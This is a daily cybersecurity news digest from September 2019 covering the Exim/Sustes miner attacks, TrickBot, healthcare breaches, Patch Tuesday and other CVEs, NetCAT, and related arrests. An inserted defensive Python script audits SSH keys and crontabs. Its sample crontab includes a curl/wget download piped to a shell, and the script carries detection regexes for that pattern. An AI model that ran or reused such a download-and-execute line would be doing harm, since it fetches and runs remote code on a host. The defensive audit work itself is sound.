Silobreaker Daily Cyber Digest – 11 September 2019
Exim vulnerability exploited to deliver Sustes malware
- Positive Technologies researchers detected a wave of attacks in which the Exim mail server vulnerability CVE-2019-10149 is exploited to deliver the cryptominer Sustes.
- The malware is delivered using two methods. The first involves a chain of scripts that installs the Monero miner on the host and adds it to crontab. One of the scripts adds a public SSH key to a user’s ‘authorized_keys’ file, which allows an attacker to obtain SSH access to the system without a password.
- The second method involves a chain of Python scripts, one of which contains a scanner for random Redis servers. As in the first method, the malware adds itself to crontab for autorun and adds its own key to the list of trusted SSH keys.
Source (Includes IOCs)
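Both delivery chains above persist in the same two places, crontab and ‘authorized_keys’, so those are the files a defender audits first on an exposed Exim host. The following is an added example, not code from the report, from Positive Technologies or from Silobreaker: it parses a constructed ‘authorized_keys’ file and a constructed crontab, flags any SSH key whose OpenSSH-style SHA256 fingerprint is not on an operator allowlist, and flags cron jobs shaped like miner persistence (download piped to a shell, binaries in world-writable or hidden directories, base64-decoded payloads). The key blobs, the 198.51.100.23 address and the file paths are invented sample data; the allowlist and the heuristics are assumptions to be adapted per host.

```python
import base64
import hashlib
import re

# --- Constructed sample data (not taken from the report) ---------------------
# One approved key plus a second key of the kind the scripts append. The key
# bodies are random-looking filler of valid length, not real public keys.
SAMPLE_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGVjaGEgdGVzdCBrZXkgZm9yIGRlbW8gcHVycG9zZXMK admin@jumphost
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0ZmFrZSBrZXkgYWRkZWQgYnkgbWFsd2FyZQ== root@unknown
"""

# One legitimate job and two entries shaped like miner persistence.
# 198.51.100.0/24 is documentation address space; the paths are invented.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * (curl -fsSL http://198.51.100.23/mr.sh || wget -q -O- http://198.51.100.23/mr.sh) | sh
@reboot /tmp/.x/kthreadd
"""


def fingerprint(key_b64: str) -> str:
    """OpenSSH-style SHA256 fingerprint of a base64 public key blob."""
    digest = hashlib.sha256(base64.b64decode(key_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


# Allowlist of fingerprints the operator expects on this host (assumption:
# built here from the sample's approved key; in practice load from inventory).
APPROVED_FINGERPRINTS = {
    fingerprint("AAAAC3NzaC1lZDI1NTE5AAAAIGVjaGEgdGVzdCBrZXkgZm9yIGRlbW8gcHVycG9zZXMK"),
}


def audit_authorized_keys(text: str) -> list:
    """Return (line_no, fingerprint_or_reason, comment) for every key not on the allowlist."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        # Skip any leading options field (e.g. command="...") and locate the key type.
        idx = next((i for i, t in enumerate(tokens)
                    if t.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or idx + 1 >= len(tokens):
            findings.append((lineno, "unparseable", line))
            continue
        try:
            fp = fingerprint(tokens[idx + 1])
        except ValueError:  # binascii.Error is a ValueError subclass
            findings.append((lineno, "undecodable", line))
            continue
        if fp not in APPROVED_FINGERPRINTS:
            comment = " ".join(tokens[idx + 2:]) or "<no comment>"
            findings.append((lineno, fp, comment))
    return findings


# Heuristics for cron commands typical of cryptominer persistence.
SUSPICIOUS_CRON = [
    (re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b"), "download piped to shell"),
    (re.compile(r"(?:^|\s)/(?:tmp|dev/shm|var/tmp)/"), "command run from world-writable dir"),
    (re.compile(r"/\.[^/\s]+/"), "hidden directory in command path"),
    (re.compile(r"base64\s+(?:-d|--decode)"), "base64-decoded payload"),
]


def audit_crontab(text: str) -> list:
    """Return (line_no, [reasons], command) for every cron entry matching a heuristic."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # The schedule is five fields, or a single @keyword; the remainder is the command.
        n_fields = 1 if line.startswith("@") else 5
        parts = line.split(None, n_fields)
        command = parts[n_fields] if len(parts) > n_fields else ""
        reasons = [why for rx, why in SUSPICIOUS_CRON if rx.search(command)]
        if reasons:
            findings.append((lineno, reasons, command))
    return findings


if __name__ == "__main__":
    for finding in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS):
        print("authorized_keys:", finding)
    for finding in audit_crontab(SAMPLE_CRONTAB):
        print("crontab:", finding)
```

On a real host the same functions would be run over each user's `~/.ssh/authorized_keys`, `/etc/crontab`, `/etc/cron.d/*` and the per-user spool under `/var/spool/cron`; the hidden-directory rule will also match paths such as `/.ssh/` in legitimate jobs, so treat its hits as prompts for review rather than verdicts.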
Cylance researchers publish analysis of TrickBot malware
- TrickBot malware was discovered in the wild in 2016 and continues to be updated and developed. The malware attempts to steal information and perform man-in-the-middle attacks on banking websites.
- The malware is delivered through emails and illegitimate websites, with malicious emails primarily relating to banking topics. Targets are often asked to enable document editing, at which point a macro runs a script that uses PowerShell to download the malware.
- Upon execution the malware pulls files from its C2. Additional DLL files give the malware reconnaissance functions and allow it to steal a wide variety of information. The malware also contains worm modules which allow it to spread across local networks.
- A full technical analysis is available via Cylance.
Source (Includes IOCs)
Leaks and Breaches
Premier Family Medical hit by ransomware attack
- A ransomware attack on the Utah-based physician group Premier Family Medical took place on July 8th, 2019, and may have exposed private health information of 320,000 patients. All ten of its Utah County locations were impacted. It is unclear whether a ransom was paid.
Private data of 2 million Verizon Pay Monthly customers exposed
- Security researcher Daley Bee was able to access 2 million Verizon Pay Monthly contracts after brute-forcing GET parameters on a Verizon-owned subdomain, which allowed him to be treated as an authenticated user. The subdomain is used by employees to access internal Point of Sale tools and view customer information.
- Exposed data includes full names, addresses, mobile numbers, model and serial number of purchased devices, and signatures.
Community Psychiatric Clinic data breaches affect 15,537 patients
- Mental health services provider Community Psychiatric Clinic suffered three separate email security breaches, affecting 3,030, 6,641, and 5,866 patients respectively. The breaches were reported to the Department of Health and Human Services’ Office for Civil Rights on August 15th, 2019.
- It is unclear whether the three breaches include two data breaches previously reported on, which took place on March 12th and May 8th, 2019.
Vulnerabilities found in OpenEMR
- Two vulnerabilities were discovered affecting the open-source medical records management tool OpenEMR version 5.0.1(6). Older versions are also believed to be affected. The flaws were patched with version 5.0.2.
- CVE-2019-8371, an arbitrary remote code execution vulnerability, could allow attackers to modify files within the OpenEMR application web root.
Source (Includes IOCs)
XSS flaw found in Premium Addons for Elementor WordPress plugin
- Plugin Vulnerabilities researchers discovered the authenticated persistent cross-site scripting (XSS) flaw after noticing a hacker probing usage of the WordPress plugin ‘Premium Addons for Elementor’. The researchers also found further insecure code, suggesting the plugin may contain additional vulnerabilities.
Microsoft Patch Tuesday fixes two zero-days
- On September 10th, 2019, Microsoft released their monthly security update which patched 80 CVEs across 15 products and services. 17 issues are rated as critical and a further 62 are assessed as important.
- Two zero-day issues, tracked as CVE-2019-1215 and CVE-2019-1214, are privilege elevation vulnerabilities. The former exists in the way Winsock handles objects in memory and the latter is related to the way Windows Common Log File System handles objects in memory.
- Three vulnerabilities, CVE-2019-1235 in Windows Text Service Framework, CVE-2019-1253 in Windows AppX Deployment Server and CVE-2019-1294 in Windows Secure Boot were also publicly disclosed.
Adobe releases patches for arbitrary code execution
- On September 10th, 2019, Adobe released patches for three security vulnerabilities in Adobe Flash Player and Adobe Application Manager.
- Adobe Flash Player contains two critical vulnerabilities tracked as CVE-2019-8070 and CVE-2019-8069. Both flaws could lead to arbitrary code execution.
- CVE-2019-8076 is a flaw related to a DLL hijacking vulnerability which could enable arbitrary code execution within the Application Manager.
Multiple vulnerabilities uncovered in D-Link and Comba Telecom network products
- Trustwave researcher Simon Kenin discovered that the D-Link DSL-2875AL router is impacted by a vulnerability which was previously identified in other D-Link products. An attacker could exfiltrate both router settings and the password, which is stored in clear text, by sending a crafted request to the web management server. This attack can be performed without authentication.
- The DSL-2875AL and DSL-2877AL models also expose, in the HTML code of their login page, the credentials required to authenticate with the Internet service provider.
- Credential vulnerabilities were also identified in Comba Telecom’s AC2400 Wi-Fi Access Controller, AP2600-I Wi-Fi Access Point and AP2600 Wi-Fi Access Point.
Basic Laboratory Information System (BLIS) impacted by two critical vulnerabilities
- CVE-2019-5617 impacts BLIS 3.5 and earlier. The flaw is due to issues in authentication and authorization verification and can lead to unauthenticated password resets.
- CVE-2019-5644 impacts BLIS 3.51 and earlier and can allow unauthenticated updates to user data, including escalation to admin privileges.
- A third vulnerability, tracked as CVE-2019-5643, is rated as high severity. The flaw impacts BLIS 3.51 and earlier, and can lead to unauthenticated enumeration of facilities and usernames.
Intel chip vulnerability allows attackers to steal sensitive information
- Researchers at VUSec discovered a vulnerability in Intel’s performance-enhancing Data-Direct I/O (DDIO) technology. DDIO is used in recent Intel server-grade processors and relieves bottleneck constraints by allowing peripherals to perform direct cache access on the CPU’s last-level cache.
- The researchers developed an attack, dubbed NetCAT, which they claim is the ‘first network-based cache attack on the processor’s last-level cache of a remote machine’. When Remote Direct Memory Access (RDMA) and DDIO are enabled, an attacker can perform a side-channel attack by sending specially crafted network packets to a DDIO-capable CPU.
- The researchers showed that they could then perform a keystroke timing attack to identify what a target was typing in a private SSH session.
- Intel classified the issue as low severity but did advise disabling DDIO and RDMA on affected CPUs or limiting direct access to vulnerable systems from untrusted networks.
Local privilege escalation vulnerability found in Microsoft Windows 10
- Fortinet researchers discovered an additional vulnerability, tracked as CVE-2019-1287, capable of local privilege escalation in Windows Network Connectivity Assistant affecting Windows 10 Enterprise or Education versions. A patch was released with the latest update.
- The vulnerability allows for process creation impersonation that can lead to privilege escalation when a Remote Procedure Call server tries to impersonate the client and start a process at the same time without the use of an explicit token.
- A similar flaw was previously found and reported to Microsoft, however no patch was made available.
Microsoft Teams package can be used to deliver malware
- Researcher Reegun Richard identified an EXE sideloading attack that abuses the Squirrel installation and update framework to execute malicious payloads using mock installation folders.
- Impacted products that use the Squirrel installation and update framework include WhatsApp, Grammarly, GitHub, Slack, and Discord.
- The researcher tested the attack by crafting a fake Microsoft Teams package that leverages a signed binary to execute in a specific location. Microsoft were informed of the issue but stated that it ‘did not meet the bar of a security issue’.
Menstruation apps found to be sharing data with Facebook
- A study by Privacy International found that multiple menstruation apps are sharing personal data with Facebook, as well as other third parties. The apps include Maya by Plackal Tech, MIA by Mobapp Development Limited, My Period Tracker by Linchpin Health, Ovulation Calculator by Pinkbird, and Mi Calendario by Grupo Familia.
- According to Privacy International, the type of information a user enters into the apps could be considered health or medical data, which is deemed sensitive data under EU data protection laws. The researchers also noted that all of the apps inform Facebook when a user opens them, before the user has agreed to the apps’ privacy policies.
- Plackal Tech has since removed Facebook SDK and Analytics SDK from its app. Facebook SDK is used for the integration of an app with Facebook’s platform.
Members of major dark web counterfeit currency ring arrested
- Europol announced that the Portuguese Judicial Police, in cooperation with Europol, arrested five individuals who were part of Europe’s second-largest counterfeit currency network on the dark web. The individuals are accused of counterfeiting and organised crime.
- A total of 1,833 counterfeit banknotes, as well as computers, printers, security paper with incorporated security threads, and more were seized following the arrests.
International operation to prevent BEC attacks leads to arrest of 281 individuals
- On September 10th, 2019, the US Department of Justice announced the results of a multi-agency investigation, named Operation reWired, which led to the arrest of 74 people in the US and 207 overseas on charges relating to financial fraud. 167 individuals were arrested in Nigeria, 18 in Turkey, and 15 in Ghana. Further arrests were also made in France, Italy, Japan, Kenya, Malaysia, and the UK.
- Operation reWired took place over a period of four months and involved organizations including the US Department of Homeland Security, the US Department of Justice, the US Department of the Treasury, and multiple partner organizations overseas. The investigation disrupted BEC schemes and resulted in the seizure of $3.7 million.
- The FBI also published information on September 10th, 2019, which showed that between June 2016 and July 2019, over $26 billion was reportedly lost globally in BEC scams.
The Silobreaker Team

Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.